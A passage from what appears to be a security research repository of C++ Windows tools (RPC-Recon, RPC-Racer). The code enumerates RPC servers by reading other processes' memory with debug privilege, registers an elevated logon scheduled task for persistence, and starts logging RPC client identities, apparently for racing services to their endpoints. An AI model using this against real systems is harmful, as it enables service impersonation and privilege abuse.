UuidToStringW(&IfID->Uuid, &stringBuffer); 48 | wstring UuidStr = reinterpret_cast(stringBuffer); 49 | std::transform(UuidStr.begin(), UuidStr.end(), UuidStr.begin(), ::toupper); 50 | RpcStringFreeW(&stringBuffer); 51 | wstring majorNum = std::to_wstring(IfID->VersMajor); 52 | wstring minorNum = std::to_wstring(IfID->VersMinor); 53 | UuidStr.append(L" "); 54 | UuidStr.append(majorNum); 55 | UuidStr.append(L"."); 56 | UuidStr.append(minorNum); 57 | return UuidStr; 58 | } 59 | 60 | // Convert only the interface UUID to std::wstring 61 | wstring UuidToWstring(const UUID* Uuid) 62 | { 63 | RPC_WSTR stringBuffer = nullptr; 64 | UuidToStringW(Uuid, &stringBuffer); 65 | wstring UuidStr = reinterpret_cast(stringBuffer); 66 | RpcStringFreeW(&stringBuffer); 67 | return UuidStr; 68 | } 69 | 70 | wstring BindHandleToWstring(RPC_BINDING_HANDLE Handle) 71 | { 72 | RPC_WSTR stringBuffer = nullptr; 73 | RpcBindingToStringBindingW(Handle, &stringBuffer); 74 | wstring bindString = reinterpret_cast(stringBuffer); 75 | RpcStringFreeW(&stringBuffer); 76 | return bindString; 77 | } 78 | 79 | // Open a handle to the service manager only once for more efficient code 80 | void SetGlobalServiceHandle() 81 | { 82 | SC_HANDLE scHandle = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_ENUMERATE_SERVICE); 83 | if (nullptr == scHandle) 84 | ThrowException("OpenSCManager failed", GetLastError()); 85 | 86 | g_ScHandle = scHandle; 87 | } 88 | 89 | // Enumerate all the services to find the one that matches the requested PID 90 | wstring GetServiceNameFromPid(DWORD Pid) 91 | { 92 | if (nullptr == g_ScHandle) 93 | SetGlobalServiceHandle(); 94 | 95 | wstring serviceName = L"N/A"; 96 | DWORD bytesNeeded = 0; 97 | DWORD servicesCount = 0; 98 | DWORD resumeHandle = 0; 99 | 100 | // Retrieve the requeired buffer size 101 | BOOL success = EnumServicesStatusExW(g_ScHandle, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_ACTIVE, nullptr, 0, &bytesNeeded, &servicesCount, &resumeHandle, nullptr); 102 | while (!success) 103 | { 104 | // Allocate the buffer 105 | PBYTE servicesBuffer = new BYTE[bytesNeeded]; 106 | 107 | // Request the data again 108 | success = EnumServicesStatusExW(g_ScHandle, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_ACTIVE, servicesBuffer, bytesNeeded, &bytesNeeded, &servicesCount, &resumeHandle, nullptr); 109 | LPENUM_SERVICE_STATUS_PROCESSW servicesArray = reinterpret_cast(servicesBuffer); 110 | for (DWORD i = 0; i < servicesCount; i++) 111 | { 112 | LPENUM_SERVICE_STATUS_PROCESSW currentService = &servicesArray[i]; 113 | if (currentService->ServiceStatusProcess.dwProcessId == Pid) 114 | { 115 | serviceName = currentService->lpDisplayName; 116 | delete[] servicesBuffer; 117 | return serviceName; 118 | } 119 | } 120 | delete[] servicesBuffer; 121 | } 122 | return serviceName; 123 | } 124 | 125 | // Translate security identifier 126 | void SidToUsername(PSID Sid, wstring& Username, wstring& SidString) 127 | { 128 | if (!IsValidSid(Sid)) 129 | { 130 | wcout << L"SID is invalid" << endl; 131 | return; 132 | } 133 | 134 | DWORD usernameLength = 0; 135 | DWORD domainLength = 0; 136 | SID_NAME_USE sidType; 137 | 138 | // Retrieve the requeired buffer size 139 | BOOL success = LookupAccountSidW(nullptr, Sid, nullptr, &usernameLength, nullptr, &domainLength, &sidType); 140 | DWORD error = GetLastError(); 141 | if (!success && ERROR_INSUFFICIENT_BUFFER != error) 142 | { 143 | wcout << L"retrieving username allocation size failed " << error << endl; 144 | return; 145 | } 146 | 147 | // Allocate the buffer 148 | wchar_t* usernameBuffer = new wchar_t[usernameLength]; 149 | wchar_t* domainBuffer = new wchar_t[domainLength]; 150 | 151 | // Request the data again 152 | success = LookupAccountSidW(nullptr, Sid, usernameBuffer, &usernameLength, domainBuffer, &domainLength, &sidType); 153 | if (!success) 154 | { 155 | wcout << L"retrieving username failed " << GetLastError() << endl; 156 | delete[] usernameBuffer; 157 | delete[] domainBuffer; 158 | return; 159 | } 160 | 161 | Username.assign(domainBuffer); 162 | Username.append(L"\\"); 163 | Username.append(usernameBuffer); 164 | delete[] usernameBuffer; 165 | delete[] domainBuffer; 166 | 167 | LPWSTR sidStringBuffer = nullptr; 168 | 169 | // Convert security identifier from binary data to string 170 | success = ConvertSidToStringSidW(Sid, &sidStringBuffer); 171 | if (!success) 172 | { 173 | wcout << L"ConvertSidToStringSidW failed " << GetLastError() << endl; 174 | return; 175 | } 176 | SidString.assign(sidStringBuffer); 177 | LocalFree(sidStringBuffer); 178 | } 179 | 180 | void GetSidAndUsername(HANDLE Token, wstring& SidStr, wstring& UsernameStr) 181 | { 182 | DWORD bytesNeeded = 0; 183 | GetTokenInformation(Token, TokenUser, nullptr, 0, &bytesNeeded); 184 | PBYTE tokenUserBuffer = new BYTE[bytesNeeded]; 185 | if (!GetTokenInformation(Token, TokenUser, tokenUserBuffer, bytesNeeded, &bytesNeeded)) 186 | { 187 | wcout << "GetTokenInformation for TokenUser failed " << GetLastError() << endl; 188 | return; 189 | } 190 | PTOKEN_USER tokenUser = reinterpret_cast(tokenUserBuffer); 191 | SidToUsername(tokenUser->User.Sid, UsernameStr, SidStr); 192 | delete[] tokenUserBuffer; 193 | } 194 | 195 | void RegisterScheduledTask(wstring& TaskName, wstring& Argument, bool HighestPrivileges) 196 | { 197 | HRESULT hr = S_OK; 198 | hr = CoInitialize(nullptr); 199 | if (FAILED(hr)) 200 | ThrowException("CoInitialize failed", hr); 201 | 202 | hr = CoInitializeSecurity(nullptr, -1, nullptr, nullptr, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, 0, nullptr); 203 | if (FAILED(hr)) 204 | ThrowException("CoInitializeSecurity failed", hr); 205 | 206 | ITaskService* taskService = nullptr; 207 | hr = CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER, IID_ITaskService, reinterpret_cast(&taskService)); 208 | if (FAILED(hr)) 209 | { 210 | CoUninitialize(); 211 | ThrowException("CoCreateInstance for IID_ITaskService failed", hr); 212 | } 213 | 214 | hr = taskService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); 215 | if (FAILED(hr)) 216 | { 217 | taskService->Release(); 218 | CoUninitialize(); 219 | ThrowException("ITaskService::Connect failed", hr); 220 | } 221 | 222 | ITaskFolder* taskFolder = nullptr; 223 | wchar_t folderPath[] = L"\\"; 224 | hr = taskService->GetFolder(folderPath, &taskFolder); 225 | if (FAILED(hr)) 226 | { 227 | taskService->Release(); 228 | CoUninitialize(); 229 | ThrowException("ITaskService::GetFolder failed", hr); 230 | } 231 | 232 | ITaskDefinition* taskDefinition = nullptr; 233 | hr = taskService->NewTask(0, &taskDefinition); 234 | taskService->Release(); 235 | if (FAILED(hr)) 236 | { 237 | taskFolder->Release(); 238 | CoUninitialize(); 239 | ThrowException("ITaskService::NewTask failed", hr); 240 | } 241 | 242 | if (HighestPrivileges) 243 | { 244 | IPrincipal* principal = nullptr; 245 | hr = taskDefinition->get_Principal(&principal); 246 | if (FAILED(hr)) 247 | { 248 | taskFolder->Release(); 249 | taskDefinition->Release(); 250 | CoUninitialize(); 251 | ThrowException("ITaskDefinition::get_Principal failed", hr); 252 | } 253 | hr = principal->put_RunLevel(TASK_RUNLEVEL_HIGHEST); 254 | principal->Release(); 255 | if (FAILED(hr)) 256 | { 257 | taskFolder->Release(); 258 | taskDefinition->Release(); 259 | CoUninitialize(); 260 | ThrowException("ITaskDefinition::get_Principal failed", hr); 261 | } 262 | } 263 | 264 | ITriggerCollection* triggerCollection = nullptr; 265 | hr = taskDefinition->get_Triggers(&triggerCollection); 266 | if (FAILED(hr)) 267 | { 268 | taskFolder->Release(); 269 | taskDefinition->Release(); 270 | CoUninitialize(); 271 | ThrowException("ITaskDefinition::get_Triggers failed", hr); 272 | } 273 | 274 | ITrigger* trigger = nullptr; 275 | hr = triggerCollection->Create(TASK_TRIGGER_LOGON, &trigger); 276 | triggerCollection->Release(); 277 | if (FAILED(hr)) 278 | { 279 | taskFolder->Release(); 280 | taskDefinition->Release(); 281 | CoUninitialize(); 282 | ThrowException("ITriggerCollection::Create failed", hr); 283 | } 284 | 285 | ILogonTrigger* logonTrigger = nullptr; 286 | hr = trigger->QueryInterface(IID_ILogonTrigger, reinterpret_cast(&logonTrigger)); 287 | trigger->Release(); 288 | if (FAILED(hr)) 289 | { 290 | taskFolder->Release(); 291 | taskDefinition->Release(); 292 | CoUninitialize(); 293 | ThrowException("ITrigger::QueryInterface failed", hr); 294 | } 295 | 296 | HANDLE tokenHandle = GetCurrentProcessToken(); 297 | wstring sidStr; 298 | wstring usernameStr; 299 | GetSidAndUsername(tokenHandle, sidStr, usernameStr); 300 | CloseHandle(tokenHandle); 301 | hr = logonTrigger->put_UserId(usernameStr.data()); 302 | logonTrigger->Release(); 303 | if (FAILED(hr)) 304 | { 305 | taskFolder->Release(); 306 | taskDefinition->Release(); 307 | CoUninitialize(); 308 | ThrowException("ILogonTrigger::put_UserId failed", hr); 309 | } 310 | 311 | IActionCollection* actionCollection = nullptr; 312 | hr = taskDefinition->get_Actions(&actionCollection); 313 | if (FAILED(hr)) 314 | { 315 | taskFolder->Release(); 316 | taskDefinition->Release(); 317 | CoUninitialize(); 318 | ThrowException("ITaskDefinition::get_Actions failed", hr); 319 | } 320 | 321 | IAction* action = nullptr; 322 | hr = actionCollection->Create(TASK_ACTION_EXEC, &action); 323 | actionCollection->Release(); 324 | if (FAILED(hr)) 325 | { 326 | taskFolder->Release(); 327 | taskDefinition->Release(); 328 | CoUninitialize(); 329 | ThrowException("IActionCollection::Create failed", hr); 330 | } 331 | 332 | IExecAction* execAction = nullptr; 333 | hr = action->QueryInterface(IID_IExecAction, reinterpret_cast(&execAction)); 334 | action->Release(); 335 | if (FAILED(hr)) 336 | { 337 | taskFolder->Release(); 338 | taskDefinition->Release(); 339 | CoUninitialize(); 340 | ThrowException("IAction::QueryInterface failed", hr); 341 | } 342 | 343 | wchar_t path[MAX_PATH] = {}; 344 | GetModuleFileNameW(GetModuleHandleW(nullptr), path, MAX_PATH); 345 | hr = execAction->put_Path(path); 346 | if (FAILED(hr)) 347 | { 348 | execAction->Release(); 349 | taskFolder->Release(); 350 | taskDefinition->Release(); 351 | CoUninitialize(); 352 | ThrowException("IExecAction::put_Path failed", hr); 353 | } 354 | 355 | if (!Argument.empty()) 356 | { 357 | hr = execAction->put_Arguments(Argument.data()); 358 | if (FAILED(hr)) 359 | { 360 | execAction->Release(); 361 | taskFolder->Release(); 362 | taskDefinition->Release(); 363 | CoUninitialize(); 364 | ThrowException("IExecAction::put_Arguments failed", hr); 365 | } 366 | } 367 | execAction->Release(); 368 | 369 | IRegisteredTask* registeredTask = nullptr; 370 | hr = taskFolder->RegisterTaskDefinition(TaskName.data(), taskDefinition, TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(L""), ®isteredTask); 371 | taskFolder->Release(); 372 | taskDefinition->Release(); 373 | if (FAILED(hr)) 374 | { 375 | CoUninitialize(); 376 | ThrowException("ITaskFolder::RegisterTaskDefinition failed", hr); 377 | } 378 | registeredTask->Release(); 379 | CoUninitialize(); 380 | wcout << L"Task created" << endl; 381 | } -------------------------------------------------------------------------------- /RPC-Recon/QueryProcesses.cpp: -------------------------------------------------------------------------------- 1 | #include "QueryProcesses.h" 2 | 3 | PBYTE g_Rpcrt4DataSectionStart = 0; 4 | DWORD g_Rpcrt4DataSectionSize = 0; 5 | 6 | RPC_SYNTAX_IDENTIFIER DceRpcSyntaxUuid = 7 | { 8 | { 0x8a885d04,0x1ceb,0x11c9,{ 0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60 } }, 9 | { 2,0 } 10 | }; 11 | 12 | void EnablePrivilege(const HANDLE TokenHandle, const LPCWSTR Privilege) 13 | { 14 | TOKEN_PRIVILEGES tokenPrivileges = {}; 15 | 16 | if (!::LookupPrivilegeValueW(nullptr, Privilege, &tokenPrivileges.Privileges[0].Luid)) 17 | { 18 | CloseHandle(TokenHandle); 19 | ThrowException("[EnablePrivilege] LookupPrivilegeValueW failed", GetLastError()); 20 | } 21 | 22 | tokenPrivileges.PrivilegeCount = 1; 23 | tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 24 | if (!::AdjustTokenPrivileges(TokenHandle, 0, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr)) 25 | { 26 | CloseHandle(TokenHandle); 27 | ThrowException("[EnablePrivilege] AdjustTokenPrivileges failed", GetLastError()); 28 | } 29 | } 30 | 31 | void EnablePrivilegeCurrentProcess(const LPCWSTR Privilege) 32 | { 33 | HANDLE tokenHandle; 34 | if (::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &tokenHandle)) 35 | { 36 | EnablePrivilege(tokenHandle, Privilege); 37 | CloseHandle(tokenHandle); 38 | } 39 | else 40 | ThrowException("[EnablePrivilegeCurrentProcess] OpenProcessToken failed", GetLastError()); 41 | } 42 | 43 | void EnableDebugPrivilegeCurrentProcess() 44 | { 45 | EnablePrivilegeCurrentProcess(SE_DEBUG_NAME); 46 | } 47 | 48 | bool ReadMemory(HANDLE ProcessHandle, PVOID Source, PVOID Dest, DWORD Size) 49 | { 50 | SIZE_T bytesRead = 0; 51 | BOOL success = ReadProcessMemory(ProcessHandle, Source, Dest, Size, &bytesRead); 52 | return success == TRUE && bytesRead == Size; 53 | } 54 | 55 | bool ValidateRpcInterface(HANDLE ProcessHandle, RPC_INTERFACE_T** interfacePtrs, UINT count) 56 | { 57 | RPC_INTERFACE_T iface = {}; 58 | 59 | // Iterate through interfaces 60 | for (UINT i = 0; i < count; i++) { 61 | 62 | if (ReadMemory(ProcessHandle, interfacePtrs[i], &iface, sizeof(RPC_INTERFACE_T))) 63 | { 64 | DWORD reqSize = sizeof(RPC_SERVER_INTERFACE_T); 65 | 66 | // Sanity check for the RPC_INTERFACE struct to look for a known transfer syntax GUID 67 | if (iface.RpcServerInterface.Length == reqSize && 68 | !memcmp(&DceRpcSyntaxUuid, &iface.RpcServerInterface.TransferSyntax, sizeof(DceRpcSyntaxUuid)) 69 | ) 70 | return true; 71 | } 72 | } 73 | 74 | return false; 75 | } 76 | 77 | RPC_SERVER_T* FindGlobalRpcServer(HANDLE Handle) 78 | { 79 | DWORD s = sizeof(RPC_SERVER_T); 80 | RPC_SERVER_T* rpcServer = new RPC_SERVER_T; 81 | PBYTE searchStartAddr = g_Rpcrt4DataSectionStart; 82 | 83 | // Iterate through .data section to find the RPC_SERVER struct 84 | for (DWORD i = 0x10e0; i < g_Rpcrt4DataSectionSize; i += 8) 85 | { 86 | // Read a potential pointer to RPC_SERVER 87 | ULONG_PTR pointer = 0; 88 | if (!ReadMemory(Handle, searchStartAddr + i, &pointer, sizeof(pointer))) 89 | continue; 90 | 91 | // Attempt to read a potential RPC_SERVER object 92 | if (!ReadMemory(Handle, reinterpret_cast(pointer), rpcServer, sizeof(RPC_SERVER_T))) 93 | continue; 94 | 95 | // Sanity check the interface dictionary 96 | if (0 < rpcServer->InterfaceDict.NumberOfEntries && rpcServer->InterfaceDict.NumberOfEntries <= MAX_SIMPLE_DICT_ENTRIES) 97 | { 98 | DWORD interfaceDictSize = rpcServer->InterfaceDict.NumberOfEntries * sizeof(PVOID); 99 | PBYTE interfaceDictBuffer = new BYTE[interfaceDictSize]; 100 | if (!ReadMemory(Handle, rpcServer->InterfaceDict.pArray, interfaceDictBuffer, interfaceDictSize)) 101 | { 102 | delete[] interfaceDictBuffer; 103 | continue; 104 | } 105 | 106 | // Pass to validation function for further checks 107 | if (ValidateRpcInterface(Handle, reinterpret_cast(interfaceDictBuffer), rpcServer->InterfaceDict.NumberOfEntries)) 108 | { 109 | rpcServer->InterfaceDict.pArray = reinterpret_cast(interfaceDictBuffer); 110 | return rpcServer; 111 | } 112 | delete[] interfaceDictBuffer; 113 | } 114 | } 115 | delete rpcServer; 116 | return nullptr; 117 | } 118 | 119 | void ExtractEndpointsInProcess(HANDLE Handle, RPC_SERVER_T* RpcServer, vector& Endpoints) 120 | { 121 | if (0 == RpcServer->AddressDict.NumberOfEntries || RpcServer->AddressDict.NumberOfEntries > MAX_SIMPLE_DICT_ENTRIES) 122 | return; 123 | 124 | DWORD addressDictSize = RpcServer->AddressDict.NumberOfEntries * sizeof(PVOID); 125 | PVOID* addressDictBuffer = reinterpret_cast(new BYTE[addressDictSize]); 126 | if (!ReadMemory(Handle, RpcServer->AddressDict.pArray, addressDictBuffer, addressDictSize)) 127 | { 128 | delete[] addressDictBuffer; 129 | return; 130 | } 131 | 132 | for (UINT i = 0; i < RpcServer->AddressDict.NumberOfEntries; i++) 133 | { 134 | RPC_ADDRESS_T rpcAddress = {}; 135 | WCHAR ProtocoleW[RPC_MAX_ENDPOINT_PROTOCOL_SIZE] = {}; 136 | WCHAR NameW[RPC_MAX_ENDPOINT_NAME_SIZE] = {}; 137 | if (!ReadMemory(Handle, addressDictBuffer[i], &rpcAddress, sizeof(rpcAddress))) 138 | break; 139 | 140 | if (!ReadMemory(Handle, rpcAddress.Protocole, ProtocoleW, sizeof(ProtocoleW))) 141 | break; 142 | 143 | if (!ReadMemory(Handle, rpcAddress.Name, NameW, sizeof(NameW))) 144 | break; 145 | 146 | wstring endpoint = ProtocoleW; 147 | if (!endpoint.compare(L"ncacn_np")) 148 | { 149 | endpoint.append(L":[\\\\"); 150 | endpoint.append(&NameW[1], 4); 151 | endpoint.append(L"\\\\"); 152 | endpoint.append(&NameW[6]); 153 | } 154 | else 155 | { 156 | endpoint.append(L":["); 157 | endpoint.append(NameW); 158 | } 159 | endpoint.append(L"]"); 160 | 161 | // Exclude interface registered by combase.dll in every process 162 | if (!endpoint.starts_with(L"ncalrpc:[OLE")) 163 | { 164 | Endpoints.push_back(endpoint); 165 | } 166 | 167 | } 168 | 169 | delete[] addressDictBuffer; 170 | } 171 | 172 | bool IsComInterface(wstring& Uuid) 173 | { 174 | wstring keyName = L"Interface\\"; 175 | keyName.append(Uuid); 176 | HKEY hKey = nullptr; 177 | LSTATUS status = RegOpenKeyExW(HKEY_CLASSES_ROOT, keyName.c_str(), 0, KEY_READ, &hKey); 178 | if (status == ERROR_SUCCESS) 179 | { 180 | RegCloseKey(hKey); 181 | return true; 182 | } 183 | // Exclude interface registered by combase.dll in every process 184 | return !Uuid.compare(L"18f70770-8e64-11cf-9af1-0020af6e72f4"); 185 | } 186 | 187 | bool IsRpcInterface(RPC_INTERFACE_T* RpcIf) 188 | { 189 | if (RpcIf->Flags & RPC_IF_OLE) 190 | return false; 191 | 192 | wstring uuid = UuidToWstring(&RpcIf->RpcServerInterface.InterfaceId.Uuid); 193 | return !IsComInterface(uuid); 194 | } 195 | 196 | void ExtractInterfacesInProcess(HANDLE Handle, RPC_SERVER_T* RpcServer, vector& Interfaces) 197 | { 198 | for (UINT i = 0; i < RpcServer->InterfaceDict.NumberOfEntries; i++) 199 | { 200 | PVOID interfaceAddress = RpcServer->InterfaceDict.pArray[i]; 201 | RPC_INTERFACE_T iface = {}; 202 | if (!ReadMemory(Handle, interfaceAddress, &iface, sizeof(iface))) 203 | return; 204 | 205 | if (IsRpcInterface(&iface)) 206 | { 207 | wstring guid = IfIdToWstring(&iface.RpcServerInterface.InterfaceId); 208 | Interfaces.push_back(guid); 209 | } 210 | } 211 | } 212 | 213 | void ExtractDataFromProcess(DWORD Pid, wstring& Name, HANDLE Handle, map>>& RpcServers) 214 | { 215 | RPC_SERVER_T* rpcServer = FindGlobalRpcServer(Handle); 216 | if (nullptr == rpcServer) 217 | return; 218 | 219 | vector endpoints; 220 | vector interfaces; 221 | ExtractEndpointsInProcess(Handle, rpcServer, endpoints); 222 | ExtractInterfacesInProcess(Handle, rpcServer, interfaces); 223 | 224 | // Skip processes that aren't RPC servers 225 | if (endpoints.size() > 0 || interfaces.size() > 0) 226 | { 227 | wstring serviceName = GetServiceNameFromPid(Pid); 228 | map> serverData; 229 | serverData[L"Process Name"] = { Name }; 230 | serverData[L"Service Name"] = { serviceName }; 231 | serverData[L"Endpoints"] = endpoints; 232 | serverData[L"UUIDs"] = interfaces; 233 | RpcServers[Pid] = serverData; 234 | } 235 | 236 | delete[] rpcServer->InterfaceDict.pArray; 237 | delete rpcServer; 238 | } 239 | 240 | // The offset of the .data section inside rpcrt4.dll will be the same for every process 241 | // Find it only once to increase efficiency 242 | void SetRpcrt4DataVA() 243 | { 244 | HMODULE moduleHandle = GetModuleHandle(L"rpcrt4.dll"); 245 | PBYTE baseAddress = reinterpret_cast(moduleHandle); 246 | PIMAGE_DOS_HEADER dosHeader = reinterpret_cast(baseAddress); 247 | PIMAGE_NT_HEADERS ntHeaders = reinterpret_cast(baseAddress + dosHeader->e_lfanew); 248 | PIMAGE_SECTION_HEADER sectionHeader = reinterpret_cast(baseAddress + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS)); 249 | for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++) 250 | { 251 | PIMAGE_SECTION_HEADER currentSection = §ionHeader[i]; 252 | if (!strcmp(reinterpret_cast(currentSection->Name), ".data")) 253 | { 254 | g_Rpcrt4DataSectionStart = baseAddress + currentSection->VirtualAddress; 255 | g_Rpcrt4DataSectionSize = currentSection->Misc.VirtualSize; 256 | return; 257 | } 258 | } 259 | ThrowException(".data section not found for rpcrt4.dll", ERROR_NOT_FOUND); 260 | } 261 | 262 | bool IsProcessValidTarget(DWORD Pid, wstring& Name, PHANDLE Handle) 263 | { 264 | // Protected Process Light denies PROCESS_VM_READ 265 | HANDLE processHandle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, Pid); 266 | if (nullptr == processHandle) 267 | { 268 | wcout << L"cannot open handle for " << Name << L" pid " << Pid << endl; 269 | wcout << L"--------------------------------------------" << endl; 270 | return false; 271 | } 272 | BOOL isWow = FALSE; 273 | BOOL success = IsWow64Process(processHandle, &isWow); 274 | if (!success) 275 | { 276 | wcout << L"IsWow64Process failed for process " << Name << L" pid " << Pid << endl; 277 | wcout << L"--------------------------------------------" << endl; 278 | CloseHandle(processHandle); 279 | return false; 280 | } 281 | if (isWow) 282 | { 283 | wcout << L"skipping wow64 process " << Name << L" pid " << Pid << endl; 284 | wcout << L"--------------------------------------------" << endl; 285 | CloseHandle(processHandle); 286 | return false; 287 | } 288 | *Handle = processHandle; 289 | return true; 290 | } 291 | 292 | /* 293 | map exmaple: 294 | { 295 | 1000: 296 | { 297 | "process name": ["svchost.exe"], 298 | "service name": ["Storage Service"], 299 | "Endpoints": ["ncalrpc:[LRPC-f5cbd0ccb243772b5c]"], 300 | "UUIDs": ["44D1520B-6133-41F0-8A66-D37305ECC357 0.0", "28942101-43DF-4EB7-B1DD-2C0C0EBF99C0 0.0"] 301 | } 302 | } 303 | */ 304 | void QueryProcesses(map>>& RpcServers) 305 | { 306 | // Debug privileges are required to read the memory of elevated processes 307 | EnableDebugPrivilegeCurrentProcess(); 308 | SetRpcrt4DataVA(); 309 | HANDLE snapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 310 | if (INVALID_HANDLE_VALUE == snapshotHandle) 311 | ThrowException("CreateToolhelp32Snapshot failed", GetLastError()); 312 | 313 | PROCESSENTRY32W entry = {}; 314 | entry.dwSize = sizeof(PROCESSENTRY32W); 315 | if (!Process32FirstW(snapshotHandle, &entry)) 316 | { 317 | CloseHandle(snapshotHandle); 318 | ThrowException("CreateToolhelp32Snapshot failed", GetLastError()); 319 | } 320 | 321 | do 322 | { 323 | wstring processName = entry.szExeFile; 324 | DWORD pid = entry.th32ProcessID; 325 | HANDLE processHandle = nullptr; 326 | 327 | if (!IsProcessValidTarget(pid, processName, &processHandle)) 328 | continue; 329 | ExtractDataFromProcess(pid, processName, processHandle, RpcServers); 330 | CloseHandle(processHandle); 331 | } while (Process32NextW(snapshotHandle, &entry)); 332 | CloseHandle(snapshotHandle); 333 | } 334 | 335 | void CompareProcsResults(map>>& ProcsEarly, map>>& ProcsLate, wstringstream& OutStream) 336 | { 337 | for (auto const& [pid, lateServerData] : ProcsLate) 338 | { 339 | auto const& serverDataIter = ProcsEarly.find(pid); 340 | 341 | // The process was created late. Display all the data 342 | if (serverDataIter == ProcsEarly.end()) 343 | { 344 | OutStream << L"PID: " << pid << endl; 345 | OutStream << L"Process Name: " << lateServerData.at(L"Process Name").at(0) << endl; 346 | OutStream << L"Service Name: " << lateServerData.at(L"Service Name").at(0) << endl; 347 | OutStream << L"Endpoints: " << endl; 348 | for (auto const& endpoint : lateServerData.at(L"Endpoints")) 349 | OutStream << L" " << endpoint << endl; 350 | OutStream << L"UUIDs: " << endl; 351 | for (auto const& uuid : lateServerData.at(L"UUIDs")) 352 | OutStream << L" " << uuid << endl; 353 | OutStream << L"--------------------------------------------" << endl; 354 | } 355 | // The process was created early. Check if the endpoints and interfaces were created late 356 | else 357 | { 358 | auto const& earlyServerData = (*serverDataIter).second; 359 | auto const& earlyEndpoints = earlyServerData.at(L"Endpoints"); 360 | auto const& lateEndpoints = lateServerData.at(L"Endpoints"); 361 | auto const& earlyUuids = earlyServerData.at(L"UUIDs"); 362 | auto const& lateUuids = lateServerData.at(L"UUIDs"); 363 | if (lateEndpoints.size() > earlyEndpoints.size() || lateUuids.size() > earlyUuids.size()) 364 | { 365 | OutStream << L"PID: " << pid << endl; 366 | OutStream << L"Process Name: " << lateServerData.at(L"Process Name").at(0) << endl; 367 | OutStream << L"Service Name: " << lateServerData.at(L"Service Name").at(0) << endl; 368 | OutStream << L"Endpoints: " << endl; 369 | for (auto const& lateEndpoint : lateEndpoints) 370 | { 371 | bool endpointRegisteredEarly = false; 372 | for (auto const& earlyEndpoint : earlyEndpoints) 373 | { 374 | if (!lateEndpoint.compare(earlyEndpoint)) 375 | endpointRegisteredEarly = true; 376 | } 377 | if (!endpointRegisteredEarly) 378 | OutStream << L" " << lateEndpoint << endl; 379 | } 380 | 381 | OutStream << L"UUIDs: " << endl; 382 | for (auto const& lateUuid : lateUuids) 383 | { 384 | bool uuidRegisteredEarly = false; 385 | for (auto const& earlyUuid : earlyUuids) 386 | { 387 | if (!lateUuid.compare(earlyUuid)) 388 | uuidRegisteredEarly = true; 389 | } 390 | if (!uuidRegisteredEarly) 391 | OutStream << L" " << lateUuid << endl; 392 | } 393 | OutStream << L"--------------------------------------------" << endl; 394 | } 395 | } 396 | } 397 | } -------------------------------------------------------------------------------- /RPC-Racer/RPC-Racer.cpp: -------------------------------------------------------------------------------- 1 | #include "RPC-Racer.h" 2 | 3 | // Use CreateToolhelp32Snapshot to avoid "Access Denied" on high integrity processes 4 | wstring GetProcFileName(DWORD Pid) 5 | { 6 | wstring path; 7 | HANDLE snapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 8 | if (INVALID_HANDLE_VALUE == snapshotHandle) 9 | { 10 | wcout << L"CreateToolhelp32Snapshot failed " << GetLastError() << endl; 11 | return path; 12 | } 13 | 14 | PROCESSENTRY32W entry = {}; 15 | entry.dwSize = sizeof(PROCESSENTRY32W); 16 | if (!Process32FirstW(snapshotHandle, &entry)) 17 | { 18 | wcout << L"Process32FirstW failed " << GetLastError() << endl; 19 | return path; 20 | } 21 | 22 | do 23 | { 24 | if (entry.th32ProcessID == Pid) 25 | { 26 | path = entry.szExeFile; 27 | break; 28 | } 29 | } while (Process32NextW(snapshotHandle, &entry)); 30 | CloseHandle(snapshotHandle); 31 | return path; 32 | } 33 | 34 | // Query the binding handle to understand who is the client of the RPC request 35 | void LogCallAttributes(RPC_BINDING_HANDLE BindingHandle) 36 | { 37 | wstring clientPrincipalName = L"not found"; 38 | wstring clientPid = L"not found"; 39 | wstring clientPath = L"not found"; 40 | wstring serviceName = L"not found"; 41 | wstring opNum = L"not found"; 42 | wstring uuid = L"not found"; 43 | RPC_CALL_ATTRIBUTES_V3_W callAttr = {}; 44 | callAttr.Version = 3; 45 | callAttr.Flags = RPC_QUERY_CLIENT_PRINCIPAL_NAME | RPC_QUERY_CLIENT_PID; 46 | 47 | // Retrieve the requeired buffer size 48 | RpcServerInqCallAttributesW(BindingHandle, &callAttr); 49 | 50 | // Allocate the buffer 51 | if (callAttr.ClientPrincipalNameBufferLength > 0) 52 | callAttr.ClientPrincipalName = reinterpret_cast(new BYTE[callAttr.ClientPrincipalNameBufferLength]); 53 | 54 | // Request the data again 55 | RPC_STATUS status = RpcServerInqCallAttributesW(BindingHandle, &callAttr); 56 | if (RPC_S_OK == status) 57 | { 58 | if (nullptr != callAttr.ClientPrincipalName) 59 | { 60 | // Save pricipal name into std::wstring and release heap buffer 61 | clientPrincipalName = reinterpret_cast(callAttr.ClientPrincipalName); 62 | delete[] callAttr.ClientPrincipalName; 63 | } 64 | if (0 != callAttr.ClientPID) 65 | { 66 | DWORD dwPid = reinterpret_cast(callAttr.ClientPID); 67 | clientPid = std::to_wstring(dwPid); 68 | clientPath = GetProcFileName(dwPid); 69 | serviceName = GetServiceNameFromPid(dwPid); 70 | } 71 | // Log which method of the interface was invoked 72 | opNum = std::to_wstring(callAttr.OpNum); 73 | uuid = UuidToWstring(&callAttr.InterfaceUuid); 74 | } 75 | else 76 | cout << "RpcServerInqCallAttributesW failed " << TranslateCode(status) << endl; 77 | 78 | wcout << L"UUID: " << uuid << endl; 79 | wcout << L"Client Principal Name: " << clientPrincipalName << endl; 80 | wcout << L"Client PID: " << clientPid << endl; 